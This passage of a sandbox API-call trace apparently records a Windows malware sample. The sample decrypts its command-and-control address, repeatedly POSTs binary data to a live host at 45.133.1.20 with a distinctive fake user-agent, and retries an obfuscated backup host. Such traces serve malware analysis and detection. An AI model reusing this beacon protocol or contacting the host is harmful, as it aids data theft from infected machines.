Size=0x212) returned 0x6a8658 [0209.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.922] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0209.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.922] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0209.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.923] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0209.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.924] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0209.924] GetProcessHeap () returned 0x6a0000 [0209.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0209.924] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0209.924] GetProcessHeap () returned 0x6a0000 [0209.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0209.924] socket (af=2, type=1, protocol=6) returned 0x5b4 [0209.925] connect (s=0x5b4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0209.952] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0209.952] GetProcessHeap () returned 0x6a0000 [0209.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0209.952] GetProcessHeap () returned 0x6a0000 [0209.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0209.953] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.954] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0209.954] GetProcessHeap () returned 0x6a0000 [0209.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0209.954] GetProcessHeap () returned 0x6a0000 [0209.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.955] GetProcessHeap () returned 0x6a0000 [0209.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0209.955] GetProcessHeap () returned 0x6a0000 [0209.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0209.956] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0209.957] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0209.957] GetProcessHeap () returned 0x6a0000 [0209.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0209.957] GetProcessHeap () returned 0x6a0000 [0209.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0209.958] send (s=0x5b4, buf=0x6bd460*, len=242, flags=0) returned 242 [0209.958] send (s=0x5b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0209.959] GetProcessHeap () returned 0x6a0000 [0209.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0209.959] recv (in: s=0x5b4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0210.036] GetProcessHeap () returned 0x6a0000 [0210.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0210.037] GetProcessHeap () returned 0x6a0000 [0210.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0210.038] GetProcessHeap () returned 0x6a0000 [0210.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0210.039] GetProcessHeap () returned 0x6a0000 [0210.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0210.039] closesocket (s=0x5b4) returned 0 [0210.040] GetProcessHeap () returned 0x6a0000 [0210.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0210.040] GetProcessHeap () returned 0x6a0000 [0210.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.042] GetProcessHeap () returned 0x6a0000 [0210.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0210.042] GetProcessHeap () returned 0x6a0000 [0210.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0210.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf6c) returned 0x5b4 [0210.045] Sleep (dwMilliseconds=0xea60) [0210.046] GetProcessHeap () returned 0x6a0000 [0210.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0210.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.048] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0210.094] GetProcessHeap () returned 0x6a0000 [0210.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0210.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.095] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0210.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.095] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.096] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.096] GetProcessHeap () returned 0x6a0000 [0210.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0210.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.098] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0210.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.099] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0210.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.100] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0210.100] GetProcessHeap () returned 0x6a0000 [0210.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.101] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.102] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.103] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.104] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.104] GetProcessHeap () returned 0x6a0000 [0210.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0210.104] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.104] GetProcessHeap () returned 0x6a0000 [0210.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0210.104] GetProcessHeap () returned 0x6a0000 [0210.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.105] GetProcessHeap () returned 0x6a0000 [0210.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0210.105] GetProcessHeap () returned 0x6a0000 [0210.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0210.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.106] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.111] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0210.140] GetProcessHeap () returned 0x6a0000 [0210.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0210.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.142] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0210.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.143] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.144] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.144] GetProcessHeap () returned 0x6a0000 [0210.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0210.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.146] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0210.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.147] CryptDestroyKey (hKey=0x6ad020) returned 1 [0210.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.148] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0210.148] GetProcessHeap () returned 0x6a0000 [0210.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.149] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0210.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.150] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0210.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.151] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0210.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.152] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0210.152] GetProcessHeap () returned 0x6a0000 [0210.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0210.152] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0210.152] GetProcessHeap () returned 0x6a0000 [0210.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0210.152] socket (af=2, type=1, protocol=6) returned 0x5b8 [0210.153] connect (s=0x5b8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0210.180] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0210.180] GetProcessHeap () returned 0x6a0000 [0210.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0210.180] GetProcessHeap () returned 0x6a0000 [0210.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0210.181] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.182] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.182] GetProcessHeap () returned 0x6a0000 [0210.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0210.182] GetProcessHeap () returned 0x6a0000 [0210.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0210.182] GetProcessHeap () returned 0x6a0000 [0210.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0210.183] GetProcessHeap () returned 0x6a0000 [0210.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0210.183] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0210.184] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.184] GetProcessHeap () returned 0x6a0000 [0210.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0210.184] GetProcessHeap () returned 0x6a0000 [0210.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0210.185] send (s=0x5b8, buf=0x6bd460*, len=242, flags=0) returned 242 [0210.185] send (s=0x5b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0210.185] GetProcessHeap () returned 0x6a0000 [0210.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0210.185] recv (in: s=0x5b8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0210.274] GetProcessHeap () returned 0x6a0000 [0210.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0210.275] GetProcessHeap () returned 0x6a0000 [0210.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0210.275] GetProcessHeap () returned 0x6a0000 [0210.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0210.275] GetProcessHeap () returned 0x6a0000 [0210.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0210.275] closesocket (s=0x5b8) returned 0 [0210.276] GetProcessHeap () returned 0x6a0000 [0210.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0210.276] GetProcessHeap () returned 0x6a0000 [0210.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.277] GetProcessHeap () returned 0x6a0000 [0210.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0210.277] GetProcessHeap () returned 0x6a0000 [0210.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0210.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc88) returned 0x5b8 [0210.280] Sleep (dwMilliseconds=0xea60) [0210.282] GetProcessHeap () returned 0x6a0000 [0210.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0210.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.284] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.307] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0210.315] GetProcessHeap () returned 0x6a0000 [0210.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c7a88 [0210.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.317] CryptImportKey (in: hProv=0x6bec18, pbData=0x6c7a88, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0210.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.318] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.319] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.319] GetProcessHeap () returned 0x6a0000 [0210.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7a88 | out: hHeap=0x6a0000) returned 1 [0210.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.333] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0210.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.334] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0210.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.335] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0210.335] GetProcessHeap () returned 0x6a0000 [0210.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.337] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.338] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.339] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.340] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.340] GetProcessHeap () returned 0x6a0000 [0210.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0210.340] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.344] GetProcessHeap () returned 0x6a0000 [0210.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0210.344] GetProcessHeap () returned 0x6a0000 [0210.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0210.345] GetProcessHeap () returned 0x6a0000 [0210.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0210.345] GetProcessHeap () returned 0x6a0000 [0210.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0210.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.352] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0210.359] GetProcessHeap () returned 0x6a0000 [0210.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0210.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.360] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0210.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.361] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.362] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.362] GetProcessHeap () returned 0x6a0000 [0210.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0210.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.365] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0210.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.366] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0210.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0210.367] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0210.367] GetProcessHeap () returned 0x6a0000 [0210.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0210.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.368] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0210.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.369] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0210.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.370] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0210.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0210.371] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0210.371] GetProcessHeap () returned 0x6a0000 [0210.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0210.371] getaddrinfo 